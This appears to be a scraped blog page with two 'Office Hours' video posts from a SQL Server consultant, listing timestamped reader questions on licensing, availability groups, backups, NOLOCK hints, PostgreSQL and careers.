I took a break from my Black Friday sale customer support emails to check in on the questions you posted at https://pollgab.com/room/brento and answer the highest-voted ones:

  • 00:00 Start
  • 00:15 Meshulam: What are the top use cases for running SQL Server in a container? Do many of your customers run SQL Server in a container?
  • 00:28 Eduardo: Do you also help customers migrate from SQL Server to PostgreSQL?
  • 00:39 RoJo: We have an AG secondary in Async mode, that gets behind due to Index rebuilds at night. Should I be concerned? I’d like to move to Sync mode, but not sure what would happen with the Index rebuild. DB is 1TB.
  • 01:01 Candy: What is your opinion of trace flag 834 (large memory pages) for possible performance gains? Running bare metal SQL 2019 enterprise / 512gb RAM.
  • 01:36 Monkey: You mentioned that SQL Server does not phone home Microsoft to check whether license key is already used on another server. Why do you think Microsoft allows that?
  • 02:00 Haydar: Have any of your clients been fined big $$$$ for improper SQL licensing?
  • 02:08 Jack: Our codebase has (NOLOCK) statements everywhere. I’m certain that most were added by devs thinking that it means “don’t cause any blocking.” Would switching to RCSI mode allow us to remove those hints?
  • 02:20 DBA Champion: If company wants to have 3 SQL Servers 2022 on-prem (Ent. Ed.) with over 99.9% uptime, and use them 3-5 years straight, would it be money saving to use new pay-as-you-go billing model, or it will be cheaper to buy three EE licenses once and use them instead?
  • 02:58 franklwambo: Who is the Brent Ozar for all things MYSQL production database support and query tuning
  • 03:11 New folder: How do PostgreSQL scaling options compare with SQL Server?
  • 03:27 Ricardo: Would you rather work remotely (again) from Iceland or a cruise ship?
  • 04:00 David: Who is the Brent Ozar of SSRS?
  • 04:06 Luthen: How often do you recommend checking the suspect_pages table?
  • 04:21 Negative Max: What was your favorite PASS session this year?
  • 04:49 Syril Karn: Would you consider teaching an “Unmastering top SQL anti-patterns” course?
  • 06:38 Mr. SqlSeeks: What would be the determining factor(s) to suggest a client use Azure Data Factory (or Databricks) for their data warehouse as opposed to SQL Server?
  • 07:16 NotCloseEnough2RetirementToStopLearning: Hi Brent, just got a Data Architecture job. I think a key to success will be being more well read about technology\data trends. Typically, my reading has been problem-solution stuff. What do you read or subscribe to for staying up on larger technology trends outside SQL Server?
  • 07:53 Todd : What is your opinion on using things like VEEAM for databases over 500 GB? Clients seem to be married to it, but t-logs keep growing. For this size, is it better to use traditional SQL backups and get VEEAM to backup the VM drives?
  • 08:16 Dopinder: Is DBA a recession proof tech job?
  • 08:49 franklwambo: I have worked with maintenance plans and Windows batch script to perform full and differential SQL server backups prior, both with trusted connections. In your experience, what approach would you tread for the other, especially on matters security.
  • 09:13 Sigrún: One of the older DB’s on our SQL 2019 server has two transaction log files for some unknown reason. Both files on the same volume but one file has autogrow while the other doesn’t. Is there any risk / performance gotcha’s in continuing with two log files vs one?

[Video] Office Hours: Black Friday Edition

Videos
0

My Black Friday sale is in its last days, so most of my time at the moment is spent keeping an eye on the site and answering customer questions. I’m happy to say it’s our best year so far, too! Y’all really like the new access-for-life options.

I took a break from the online frenzy to check in on the questions you posted at https://pollgab.com/room/brento and answer the highest-voted ones:

Here’s what we covered:

  • 00:00 Start
  • 00:30 Marian: The database that my company developed for over 20 years has a lot design problems, with very obvious normalization and performance issues. The business approach is keep fixing whatever issues are and will appear. Would you rather recommend developing a new one, or keep fixing?
  • 02:53 George : Hi Brent, I’m a sql dev /learning performance dba (enthusiastic amateur). We have an external consultant who has stated that sql server is self tuning and reevaluates after 3 runs. I cannot find anything about this online, do you have any idea of what they might mean?
  • 04:05 ChiHarley: Microsoft is pushing my client to activate the SQL IaaS Extension on their Azure VMs. Do you like to enable the extension, or do you have an opinion on it?
  • 05:42 Brentosaur: How about creating “Funtamentals of Locks and Blocking” classes? I would love to watch them
  • 06:31 Carlo: Hi Brent, any updates regarding the problem of ‘AlwaysOn’ cluster errors due to heart-beat timeout based on Veeam VM snapshots? Thanks!
  • 07:36 Jessica: Hey brent, have you recently done a talk on / know a good recent talk on youtube for setting up Log Shipping for DR? Its been a while since the last time I had to deal with it (2008R2 in 2012 or so) and wanted to make sure there aren’t any new gotchas
  • 08:20 Cassian: How do you know if auto growth events are benign or problematic?
  • 09:33 Double espressos for breakfast: Hi Brent – love all that you have done for the SQL community. You’re clearly a bright guy and could do anything you put your mind to. Why did you choose database administration of all things?